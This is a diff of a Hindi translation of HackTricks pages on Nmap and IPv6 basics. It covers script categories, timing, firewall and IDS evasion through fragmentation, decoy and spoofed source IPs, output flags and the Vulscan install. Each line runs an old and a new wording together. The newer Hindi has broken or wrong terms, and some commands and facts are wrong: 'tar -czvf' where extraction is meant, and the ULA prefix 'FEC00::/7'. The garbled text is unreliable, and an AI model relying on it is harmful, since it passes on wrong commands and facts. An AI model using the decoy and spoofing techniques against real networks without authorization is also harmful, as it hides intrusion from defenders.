**Scripts** **स्क्रिप्ट्स**
\--script _\<नाम>_|_\<श्रेणी>_|_\<निर्देशिका>_|_\<अभिव्यक्ति>_\[,...] \--script _\<नाम>_|_\<श्रेणी>_|_\<निर्देशिका>_|_\<अभिव्यक्ति>_\[,...]
@ -64,21 +65,21 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
उपलब्ध श्रेणियाँ हैं: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, और vuln उपलब्ध श्रेणियाँ हैं: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, और vuln
* **Auth:** प्रमाणीकरण के लिए उपलब्ध सभी अपने _स्क्रिप्ट_ को चलाता है * **Auth:** प्रमाणीकरण के लिए उपलब्ध सभी अपने स्क्रिप्ट्स को चलाता है
* **Default:** उपकरण के डिफ़ॉल्ट बुनियादी _स्क्रिप्ट_ को चलाता है * **Default:** उपकरण के डिफ़ॉल्ट बुनियादी स्क्रिप्ट्स को चलाता है
* **Discovery:** _target_ या पीड़िता से जानकारी प्राप्त करता है * **Discovery:** लक्ष्य या पीड़िता से जानकारी प्राप्त करता है
* **External:** बाह्य संसाधनों का उपयोग करने के लिए _स्क्रिप्ट_ * **External:** बाहरी संसाधनों का उपयोग करने के लिए स्क्रिप्ट
* **Intrusive:** पीड़ित या _target_ के लिए अभिमानी माने जाने वाले _स्क्रिप्ट_ का उपयोग करता है * **Intrusive:** उस्ताद या लक्ष्य के लिए अभिव्यक्ति माने जाने वाले स्क्रिप्ट्स का उपयोग करता है
* **Malware:** क्या खुले हैं कोड या _backdoors_ (पिछले दरवाजे) द्वारा कोई जुड़ाव है या नहीं जांचता है * **Malware:** क्या खुले हैं कोड या अवैध द्वार (बैकडोअर्स) द्वारा
* **Safe:** अभिमानी नहीं हैं _स्क्रिप्ट_ को चलाता है * **Safe:** अभिव्यक्ति नहीं करने वाले स्क्रिप्ट्स को चलाता है
* **Vuln:** सबसे अधिक जानी जाने वाली कमियों का पता लगाता है * **Vuln:** सबसे ज्यादा जानी जाने वाली वुलनरेबिलिटी का पता लगाता है
* **All:** उपलब्ध NSE विस्तार वाले सभी _स्क्रिप्ट_ को चलाता है * **All:** उपलब्ध NSE विस्तार वाले सभी स्क्रिप्ट्स को चलाता है
स्क्रिप्ट खोजने के लिए: स्क्रिप्ट्स खोजने के लिए:
**nmap --script-help="http-\*" -> जो http- से शुरू होते हैं** **nmap --script-help="http-\*" -> जो http- से शुरू होते हैं**
**nmap --script-help="not intrusive" -> उनमें से सभी जो नहीं हैं** **nmap --script-help="not intrusive" -> उन सभी को छोड़कर**
**nmap --script-help="default or safe" -> जो एक में हैं या दूसरे में या दोनों में** **nmap --script-help="default or safe" -> जो एक में हैं या दूसरे में या दोनों में**
@ -96,37 +97,37 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
\--script-updatedb \--script-updatedb
**स्क्रिप्ट का उपयोग करने के लिए केवल नाम दर्ज करें: namp --script नाम_देना_है\_स्क्रिप्ट लक्ष्य** --> स्क्रिप्ट और स्कैनर दोनों को चलाने के लिए स्क्रिप्ट दर्ज करने पर, इसलिए स्कैनर के विकल्प भी दर्ज किए जा सकते हैं, हम **“safe=1”** जोड़ सकते हैं ताकि केवल सुरक्षित वाले ही चलें। **स्क्रिप्ट का उपयोग करने के लिए केवल नाम दर्ज करें: namp --script नाम_दर्ज_करें लक्ष्य** --> स्क्रिप्ट और स्कैनर दोनों को चलाने के लिए स्क्रिप्ट दर्ज करने पर, इसलिए स्कैनर के विकल्प भी जोड़ सकते हैं, हम **“safe=1”** जोड़ सकते हैं ताकि केवल सुरक्षित वाले ही चलें।
**समय नियंत्रण** **समय नियंत्रण**
**Nmap सेकंड, मिनट, ms में समय को संशोधित कर सकता है:** --host-timeout arguments 900000ms, 900, 900s, और 15m सभी एक ही चीज करते हैं। **Nmap सेकंड, मिनट, ms में समय को संशोधित कर सकता है:** --host-timeout arguments 900000ms, 900, 900s, और 15m सभी एक ही चीज करते हैं।
Nmap होस्ट की कुल संख्या को समूहों में विभाजित करता है और उन समूहों का विश्लेषण ब्लॉक में करता है, जिसका मतलब है कि जब तक सभी विश्लेषित नहीं हो जाते हैं, तब तक यह अगले ब्लॉक पर नहीं जाता है (और उपयोगकर्ता को तब तक कोई अद्यतन नहीं मिलता है जब तक ब्लॉक का विश्लेषण नहीं हो जाता है) इस तरह, nmap के लिए बड़े समूहों का उपयोग करना अधिक उपयुक्त है। डिफ़ॉल्ट रूप से कक्षा C में 256 का उपयोग करता है। Nmap होस्ट की कुल संख्या को समूहों में विभाजित करता है और उन समूहों का विश्लेषण ब्लॉक में करता है, ताकि जब तक सभी विश्लेषित नहीं हो जाते हैं, तब तक अगले ब्लॉक पर नहीं जाता है (और उपयोगकर्ता को भी कोई अद्यतन नहीं मिलता है जब तक ब्लॉक का विश्लेषण नहीं हो जाता है) इस तरह, nmap के लिए बड़े समूहों का उपयोग करना अधिक उपयुक्त है। डिफ़ॉल्ट रूप से कक्षा C में 256 का उपयोग करता है।
इसे बदल सकते हैं\*\*--min-hostgroup\*\* _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (समानकालिक स्कैन समूह आकारों को समायोजित करें) इसे बदल सकते हैं\*\*--min-hostgroup\*\* _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (समानकालिक स्कैन समूह आकारों को समायोजित करें)
समानकालिक स्कैनरों की संख्या को नियंत्रित किया जा सकता है लेकिन यह बेहतर है कि न करें (nmpa में पहले से ही नेटवर्क की स्थिति के आधार पर स्वचालित नियंत्रण शामिल है): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_ समानकालिक स्कैनरों की संख्या को नियंत्रित किया जा सकता है लेकिन यह बेहतर है कि न करें (nmpa में नेटवर्क की स्थिति के आधार पर स्वचालित नियंत्रण शामिल है): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
हम rtt टाइमआउट को संशोधित कर सकते हैं, लेकिन आम तौर पर यह आवश्यक नहीं होता: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_ हम rtt टाइमआउट को संशोधित कर सकते हैं, लेकिन आम तौर पर आवश्यक नहीं होता: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
हम प्रयासों की संख्या को संशोधित कर सकते हैं:**--max-retries** _**\<numtries>**_ हम प्रयासों की संख्या को संशोधित कर सकते हैं:**--max-retries** _**\<numtries>**_
हम होस्ट के स्कैनिंग के समय को संशोधित कर सकते हैं: **--host-timeout** _**\<time>**_ हम होस्ट के स्कैनिंग का समय संशोधित कर सकते हैं: **--host-timeout** _**\<time>**_
हम प्रत्येक परीक्षण के बीच का समय संशोधित कर सकते हैं ताकि धीमे चले: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_ हम प्रत्येक परीक्षण के बीच समय ो धीमकरने के लिए समय को संशोधित कर सकते हैं: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_
हम प्रति सेकंड पैकेट की संख्या को संशोधित कर सकते हैं: **--min-rate** _**\<number>**_**;** **--max-rate** _**\<number>**_ हम प्रति सेकंड पैकेट की संख्या को संशोधित कर सकते हैं: **--min-rate** _**\<number>**_**;** **--max-rate** _**\<number>**_
बहुत से पोर्ट फ़िल्टर या बंद होने के कारण बहुत देर तक जवाब नहीं देते, अगर हमें केवल खुले पोर्टों की जरुरत है, तो हम इसे तेज़ कर सकते हैं: **--defeat-rst-ratelimit** बहुत सारे पोर्ट फ़िल्टर या बंद होने पर बहुत समय लेते हैं, अगर हमें केवल खुले पोर्ट्स की जरूरत है तो हम तेजी से जा सकते हैं: **--defeat-rst-ratelimit**
nmap को कितना प्रबल बनाना चाहिए, इसे परिभाषित करने के लिए: -T paranoid|sneaky|polite|normal|aggressive|insane Nmap कितना प्रवेशनात्मक होना चाहिए यह निर्धारित करने के लिए: -T paranoid|sneaky|polite|normal|aggressive|insane
\-T (0-1) \-T (0-1)
\-T0 --> केवल एक पोर्ट की एक साथ स्कैनिंग की जाती है और अगले के लिए 5 मिनट तक इंतजार किया जाता है \-T0 --> केवल एक पोर्ट को एक साथ स्कैन किया जाता है और अगले के लिए 5 मिनट तक इंतजार किया जाता है
\-T1 और T2 --> बहुत समान हैं लेकिन केवल 15 और 0.4 सेकंड के बीच प्रत्येक परीक्षण का इंतजार करते हैं \-T1 और T2 --> बहुत समान हैं लेकिन प्रत्येक परीक्षण के बीच केवल 15 और 0.4 सेकंड का इंतजार करते हैं
\-T3 --> डिफ़ॉल्ट व्यवहार, समानकालिक में शामिल है \-T3 --> डिफ़ॉल्ट व्यवहार, समानकालिक में शामिल है
@ -134,50 +135,50 @@ nmap को कितना प्रबल बनाना चाहिए, इ
\-T5 --> --max-rtt-timeout 300ms --min-rtt-timeout 50ms --initial-rtt-timeout 250ms --max-retries 2 --host-timeout 15m --max-scan-delay 5ms \-T5 --> --max-rtt-timeout 300ms --min-rtt-timeout 50ms --initial-rtt-timeout 250ms --max-retries 2 --host-timeout 15m --max-scan-delay 5ms
**Firewall/IDS** **फ़ायरवॉल/IDS**
पोर्टों को गुजारने नहीं देते और पैकेटों का विश्लेषण करते हैं। पोर्ट्स को गुजरने नहीं देते और पैकेट्स का विश्लेषण करते हैं।
**-f** पैकेटों को फ्रैगमेंट करने के लिए, डिफ़ॉल्ट रूप से वे 8 बाइट के बाद फ्रैगमेंट करते हैं, इस आकार को निर्दिष्ट करने के लिए हम ..mtu का उपयोग कर हैं (इसके साथ, -f का उपयोग न करें), ऑफ़सेट 8 के गुणक होना चाहिए। **संस्करण और स्क्रिप्ट के विश्लेषण फ्रैगमेंटेशन का समर्थन नहीं करते** **-f** पैकेट को फ्रैगमेंट करने के लिए, डिफ़ॉल्ट रूप से यह 8 बाइट के बाद फ्रैगमेंट करता है, इस आकार को निर्दिष्ट करने के लिए ..mtu का उपयोग करें (इसके साथ, -f का उपयोग न करें), ऑफ़सेट 8 के गुणक होना चाहिए। **संस्करण और स्क्रिप्ट के स्कैनर्स फ्रैगमेंटेशन का समर्थन नहीं करते**
**-D डेकॉय1,डेकॉय2,मैं** Nmap अन्य IP पतों के साथ स्कैनर भेजता है, जिसे मूल पते के रूप में छुपाता है। यदि आप में सूची में ME डालते हैं, तो nmap आपको वहाँ स्थानित करेगा, आपको पूरी तरह से मास्क करने के लिए अपने से पहले 5 या 6 डेकॉय को डालना बेहतर है। RND:\<संख्या> के साथ यादृच्छिक IP उत्पन्न किए जा सकते हैं। टीसीपी कनेक्शन के बिना संस्करण डिटेक्टर के साथ काम नहीं करते। यदि आप एक नेटवर्क के अंदर हैं, तो आपको सक्रिय IP पतों का उपयोग करना चाहिए, क्योंकि अन्यथा यह बहुत आसान हो जाएगा कि आप ही एकमात्र सक्रिय हैं। **-D डेकॉय1,डेकॉय2,मैं** Nmap अन्य IP पतों के साथ स्कैनर भेजता है, जैसे कि मूल पतों के रूप में, इस तरह आपको छुपाता है। यदि आप में सूची में ME डालते हैं, तो nmap आपको वहां स्थित करेगा, आपको पूरी तरह से मास्क करने के लिए अपने से पहले 5 या 6 डेकॉय डालना बेहतर है। RND:\<संख्या> के साथ यादृच्छिक IP उत्पन्न किए जा सकते हैं। टीसीपी कनेक्शन के बिना संस्करण डिटेक्टर के साथ काम नहीं करते। यदि आप एक नेटवर्क के अंदर हैं, तो सक्रिय IP का उपयोग करना उपयुक्त है, क्योंकि अन्यथा आसानी से पता लगाया जा सकता है कि आप ही एकमात्र सक्रिय हैं।
यादृच्छिक IP का उपयोग करने के लिए: nmap-D RND: 10 Ip_लक्ष्य यादृच्छिक IP का उपयोग करने के लिए: nmap-D RND: 10 Ip_लक्ष्य
**-S IP** जब Nmap आपका IP पता नहीं पकड़ता है तो आपको इसे देना होगा। यहाँ एक और लक्ष्य जो उन्हें स्कैन कर रहा है, उसे लगाने के लिए भी क **-S IP** जब Nmap आपका IP पता नहीं लेता है तो आपको इसे देना पड़ता है। इसका उपयोग उन्हें यह लगाने के लिए भी किया जा सकता है कि कोई अन्य लक्ष्य उन्हें स्कैन कर रहा है
**--proxies** _**\<कॉमा-सेपरेटेड सूची प्रॉक्सी URL>**_ प्रॉक्सी का उपयोग करने के लिए, कभी-कभी एक प्रॉक्सी उतने खुले कनेक्शन नहीं रखता जितने nmap चाहता है, इसलिए पैरालेलिज़्म को संशोधित करना होगा: --max-parallelism **--proxies** _**\<Comma-separated list of proxy URLs>**_ प्रॉक्सी का उपयोग करने के लिए, कभी-कभी एक प्रॉक्सी उस संख्या की तरह खुली रखता है जितनी nmap चाहता है, इसलिए हमें पैरालेलिज़्म को संशोधित करना होगा: --max-parallelism
**-sP** ARP के माध्यम से होस्ट का पता लगाने के लिए जो नेटवर्क में हैं जिसमें हम हैं **-sP** हमारे ARP के माध्यम से नेटवर्क में होस्ट का खोज करने के लिए
बहुत से व्यवस्थापक एक नियम बनाते हैं जो फ़ायरवॉल में एक विशेष पोर्ट से आने वाले सभी पैकेटों को पारित करने देता है (जैसे 20, 53 और 67), हम nmap को यह कह सकते हैं कि हमारे पैकेट उन पोर्ट्स से भेजें: **nmap --source-port 53 Ip** बहुत से व्यवस्थापक एक फ़ायरवॉल में एक नियम बनाते हैं जो एक विशेष पोर्ट से आने वाले सभी पैकेटों को पारित करने देता है (जैसे 20, 53 और 67), हम nmap को यह कह सकते हैं कि हमारे पैकेट उन पोर्ट से भेजें: **nmap --source-port 53 Ip**
**आउटपुट** **आउटपुट**
**-oN फ़ाइल** सामान्य आउटपुट **-oN file** सामान्य आउटपुट
**-oX फ़ाइल** XML आउटपुट **-oX file** XML आउटपुट
**-oS फ़ाइल** स्क्रिप्ट किडीज का आउटपुट **-oS file** स्क्रिप्ट किडीज का आउटपुट
**-oG फ़ाइल** grepable आउटपुट **-oG file** grepable आउटपुट
**-oA फ़ाइल** -oS को छोड़कर सभी **-oA file** -oS को छोड़कर सभी
**-v स्तर** वर्बोसिटी **-v level** वर्बोसिटी
**-d स्तर** डीबगिंग **-d level** डीबगिंग
**--reason** होस्ट और स्थिति का कारण **--reason** होस्ट और स्थिति का कारण
**--stats-every समय** हर इस समय हमें बताता है कि कैसे जा रहा है **--stats-every time** हर इस समय के बाद हमें बताता है कि कैसे जा रहा है
**--packet-trace** देखने के लिए कि कौन से पैकेट निकल रहे हैं, फ़िल्टर जैसे निर्दिष्ट किए जा सकते हैं: --version-trace या --script-trace **--packet-trace** देखने के लिए कि कौन से पैकेट निकल रहे हैं, हम फ़िल्टर जैसे निर्दिष्ट क सकते हैं: --version-trace या --script-trace
**--open** खुले, खुले|फ़िल्टर किए गए और अफ़िल्टर को दिखाता है **--open** खुले हुए, खुले हुए|फ़िल्टर किए गए और अफ़िल्टर को दिखाता है
**--resume फ़ाइल** एक सारांश निकालता है **--resume file** एक सारांश निकालता है
**विविध** **मिसेलेनियस**
**-6** ipv6 की अनुमति देता है **-6** ipv6 की अनुमति देता है
@ -185,7 +186,7 @@ nmap को कितना प्रबल बनाना चाहिए, इ
**रन टाइम** **रन टाइम**
Nmap चलते समय हम विकल्प बदल सकते हैं: नमैप चलते समय हम विकल्प बदल सकते हैं:
v / V वर्बोसिटी स्तर बढ़ाएं / कम करें v / V वर्बोसिटी स्तर बढ़ाएं / कम करें
@ -197,7 +198,7 @@ p / P पैकेट ट्रेसिंग को चालू / बंद
**Vulscan** **Vulscan**
Nmap का स्क्रिप्ट जो एक ऑफ़लाइन डेटाबेस में प्राप्त सेवाओं के संस्करणों को देखता है (जो अन्य महत्वपूर्ण से डाउनलोड किया जाता है) और संभावित भेदभाव देता है नमैप का स्क्रिप्ट जो एक ऑफ़लाइन डेटाबेस में प्राप्त सेवाओं के संस्करणों को देखता है (जो अन्य महत्वपूर्ण से डाउनलोड किया जाता है) और संभावित भेदभाव देता है
उस डेटाबेस का उपयोग करता है: उस डेटाबेस का उपयोग करता है:
@ -210,7 +211,7 @@ Nmap का स्क्रिप्ट जो एक ऑफ़लाइन ड
7. Exploitdb.csv | [http://www.exploit-db.com](http://www.exploit-db.com/) 7. Exploitdb.csv | [http://www.exploit-db.com](http://www.exploit-db.com/)
8. Openvas.csv | [http://www.openvas.org](http://www.openvas.org/) 8. Openvas.csv | [http://www.openvas.org](http://www.openvas.org/)
इसे डाउनलोड और Nmap फ़ोल्डर में स्थापित करने के लिए: इसे डाउनलोड और स्थापित करने के लिए Nmap फ़ोल्डर में:
wget http://www.computec.ch/projekte/vulscan/download/nmap\_nse\_vulscan-2.0.tar.gz && tar -czvf nmap\_nse\_vulscan-2.0.tar.gz vulscan/ && sudo cp -r vulscan/ /usr/share/nmap/scripts/ wget http://www.computec.ch/projekte/vulscan/download/nmap\_nse\_vulscan-2.0.tar.gz && tar -czvf nmap\_nse\_vulscan-2.0.tar.gz vulscan/ && sudo cp -r vulscan/ /usr/share/nmap/scripts/
@ -222,28 +223,10 @@ wget http://www.computec.ch/projekte/vulscan/download/nmap\_nse\_vulscan-2.0.tar
एक विशिष्ट डेटाबेस का उपयोग करने के लिए: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_A\_ESCANEAR एक विशिष्ट डेटाबेस का उपयोग करने के लिए: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_A\_ESCANEAR
## Nmap सेवा स्कैन को तेज करें x16 ## Nmap सेवा स्कैन को 16 गुणा तेज करें
इस [**पोस्ट**](https://joshua.hu/nmap-speedup-service-scanning-16x) के अनुसार, आप nmap सेवा विश्लेषण की गति बढ़ा सकते हैं जिसमें आपको सभी **`totalwaitms`** मानों को **300** और **`tcpwrappedms`** को **200** में संशोधित करना होगा। इस [**पोस्ट**](https://joshua.hu/nmap-speedup-service-scanning-16x) के अनुसार, आप नमैप सेवा विश्लेषण को तेज कर सकते हैं जिसके लिए आपको सभी **`totalwaitms`** मानों को **`/usr/share/nmap/nmap-service-probes`** में **300** और **`tcpwrappedms`** को **200** में संशोधित करना होगा।
इसके अतिरिक्त, जो प्रोब्स का विशेष रूप से परिभाषित **`servicewaitms`** नहीं है, वे एक डिफ़ॉल्ट मान **`5000`** का उपयोग करते हैं। इसलिए, हम इन प्रोब्स में मान जोड़ सकते हैं, या हम **nmap को कंपाइल** कर सकते हैं और [**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79) में डिफ़ॉल्ट मान बदल सकते हैं। इसके अतिरिक्त, जो प्रोब्स का विशेष रूप से परिभाषित **`servicewaitms`** नहीं है, वे एक डिफ़ॉल्ट मान **`5000`** का उपयोग करते हैं। इसलिए, हम इन प्रोब्स में मान जोड़ सकते हैं, या हम **नमैप को कंपाइल** कर सकते हैं और [**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79) में डिफ़ॉल्ट मान को बदल सकते हैं।
अगर आप चाहते हैं कि **`totalwaitms`** और **`tcpwrappedms`** के मानों को `/usr/share/nmap/nmap-service-probes` फ़ाइल में किसी भी प्रकार से न बदलें, तो आप [पार्सिंग कोड](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) को संपादित कर सकते हैं ताकि `nmap-service-probes` फ़ाइल में ये मान पूरी तरह से नजरअंदाज किए जाएं। अगर आप चाहते हैं कि आप `/usr/share/nmap/nmap-service-probes` फ़ाइल में **`totalwaitms`** और **`tcpwrappedms`** के मानों को पूरी तरह से बदलना नहीं है, तो आप [पार्सिंग कोड](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) को संपादित कर सकते हैं ताकि ये मान `nmap-service-probes` फ़ाइल में पूरी तरह से नजरअंदाज किए जाएं।
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी कंपनी का विज्ञापन देखना चाहते हैं **HackTricks** में या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
</details>

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
जीसीपी हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) का खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को पीआर जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
</details> </details>
{% endhint %}
# IPv6 मूल सिद्धांत # IPv6 मूल सिद्धांत
@ -19,24 +20,24 @@ HackTricks का समर्थन करने के अन्य तरी
IPv6 पते नेटवर्क संगठन और उपकरण अंतराक्रिया को बढ़ावा देने के लिए संरचित हैं। एक IPv6 पता इस प्रकार विभाजित होता है: IPv6 पते नेटवर्क संगठन और उपकरण अंतराक्रिया को बढ़ावा देने के लिए संरचित हैं। एक IPv6 पता इस प्रकार विभाजित होता है:
1. **नेटवर्क प्रिफिक्स**: पहले 48 बिट, जो नेटवर्क सेगमेंट को निर्धारित करते हैं 1. **नेटवर्क प्रिफिक्स**: पहले 48 बिट, नेटवर्क सेगमेंट को निर्धारित करने वाले
2. **सबनेट आईडी**: अगले 16 बिट, नेटवर्क के भीतर विशिष्ट सबनेट को परिभाषित करने के लिए उपयोग किए जाते हैं। 2. **सबनेट आईडी**: अगले 16 बिट, नेटवर्क में विशिष्ट सबनेट को परिभाषित करने के लिए उपयोग किए जाते हैं।
3. **इंटरफेस पहचानकर्ता**: अंतिम 64 बिट, सबनेट के भीतर एक उपकरण को अद्वितीय रूप से पहचानने के लिए 3. **इंटरफेस पहचानकर्ता**: अंतिम 64 बिट, सबनेट के भीतर एक उपकरण को विशेष रूप से पहचानने वाले
जबकि IPv6 ARP प्रोटोकॉल को छोड़ देता है जो IPv4 में पाया जाता है, तो यह **ICMPv6** को पेश करता है जिसमें दो प्रमुख संदेश होते हैं: जबकि IPv6 ARP प्रोटोकॉल को छोड़ देता है जो IPv4 में पाया जाता है, तो यह **ICMPv6** को पेश करता है जिसमें दो मुख्य संदेश होते हैं:
- **पड़ोसी अनुरोध (NS)**: पते के संक्षेपण के लिए मल्टीकास्ट संदेश। - **पड़ोसी अनुरोध (NS)**: पते के संक्षेपण के लिए मल्टीकास्ट संदेश।
- **पड़ोसी विज्ञापन (NA)**: NS या स्वेच्छापूर्वक घोषणाओं के लिए यूनिकास्ट प्रतिक्रियाएँ। - **पड़ोसी विज्ञापन (NA)**: NS या स्वेच्छापूर्वक घोषणाओं के लिए यूनिकास्ट प्रतिक्रियाएँ।
IPv6 विशेष पता प्रकारों को भी शामिल करता है: IPv6 विशेष पता प्रकारों को भी शामिल करता है:
- **लूपबैक पता (`::1`)**: IPv4 के `127.0.0.1` के समान, होस्ट के भीतर आंतरिक संचार के लिए। - **लूपबैक पता (`::1`)**: IPv4 के `127.0.0.1` के समान, होस्ट के भीतर आंतरिक संचार के लिए।
- **लिंक-स्थानीय पते (`FE80::/10`)**: स्थानीय नेटवर्क गतिविधियों के लिए, इंटरनेट रूटिंग के लिए नहीं। एक ही स्थानीय नेटवर्क पर उपकरण इस श्रेणी का उपयोग करके एक-दूसरे को खोज सकते हैं। - **लिंक-स्थानीय पते (`FE80::/10`)**: स्थानीय नेटवर्क गतिविधियों के लिए, इंटरनेट रूटिंग के लिए नहीं। एक ही स्थानीय नेटवर्क पर उपकरण एक-दूसरे को इस श्रेणी का उपयोग करके खोज सकते हैं।
### नेटवर्क कमांड में IPv6 का व्यावहारिक उपयोग ### नेटवर्क कमांडों में IPv6 का व्यावहारिक उपयोग
IPv6 नेटवर्कों के साथ बातचीत करने के लिए आप विभिन्न कमांड का उपयोग कर सकते हैं: IPv6 नेटवर्क के साथ बातचीत करने के लिए आप विभिन्न कमांडों का उपयोग कर सकते हैं:
- **पिंग लिंक-स्थानीय पतों**: `ping6` का उपयोग करके स्थानीय उपकरणों की मौजूदगी की जांच करें। - **पिंग लिंक-स्थानीय पतों**: `ping6` का उपयोग करके स्थानीय उपकरणों की मौजूदगी की जांच करें।
- **पड़ोसी खोज**: लिंक पर खोजे गए उपकरणों को देखने के लिए `ip neigh` का उपयोग करें। - **पड़ोसी खोज**: लिंक पर खोजे गए उपकरणों को देखने के लिए `ip neigh` का उपयोग करें।
- **alive6**: एक समान नेटवर्क पर उपकरणों की खोज के लिए एक वैकल्पिक उपकरण। - **alive6**: एक समान नेटवर्क पर उपकरणों को खोजने के लिए एक वैकल्पिक उपकरण।
नीचे कुछ कमांड उदाहरण हैं: नीचे कुछ कमांड उदाहरण हैं:
```bash ```bash
@ -48,43 +49,43 @@ alive6 eth0
``` ```
## **MAC पते से Link-local IPv6 निकालना** ## **MAC पते से Link-local IPv6 निकालना**
MAC पते **`12:34:56:78:9a:bc`** को जानते हुए, आप Link-local IPv6 पता निम्नलिखित तरीके से बना सकते हैं: दिये गए MAC पते **`12:34:56:78:9a:bc`** से निम्नलिखित रूप से Link-local IPv6 पता बनाया जा सकता है:
1. MAC को IPv6 प्रारूप में रूपांतरित करें: **`1234:5678:9abc`** 1. MAC को IPv6 प्रारूप में रूपांतरित करें: **`1234:5678:9abc`**
2. `fe80::` जोड़ें और बीच में `fffe` डालें: **`fe80::1234:56ff:fe78:9abc`** 2. `fe80::` जोड़ें और बीच में `fffe` डालें: **`fe80::1234:56ff:fe78:9abc`**
3. बाएं से सातवें बिट को उलट दें, `1234` को `1034` में बदलें: **`fe80::1034:56ff:fe78:9abc`** 3. बाएं से सातवां बिट उलटाएं, `1234` को `1034` में बदलें: **`fe80::1034:56ff:fe78:9abc`**
## **IPv6 पता प्रकार** ## **IPv6 पता प्रकार**
- **अद्वितीय स्थानीय पता (ULA)**: स्थानीय संचार के लिए, सार्वजनिक इंटरनेट मार्गनिर्देशन के लिए नहीं। प्रिफिक्स: **`FEC00::/7`** - **अद्वितीय स्थानीय पता (ULA)**: स्थानीय संचार के लिए, सार्वजनिक इंटरनेट मार्गनिर्देशन के लिए नहीं। प्रिफिक्स: **`FEC00::/7`**
- **मल्टीकास्ट पता**: एक से अधिक संचार के लिए। सभी इंटरफेस मेंल्टीकास्ट समूह में पहुंचाया जाता है। प्रिफिक्स: **`FF00::/8`** - **मल्टीकास्ट पता**: एक से अधिक संचार के लिए। सभी इंटरफेस मेंल्टीकास्ट समूह में पहुंचाया जाता है। प्रिफिक्स: **`FF00::/8`**
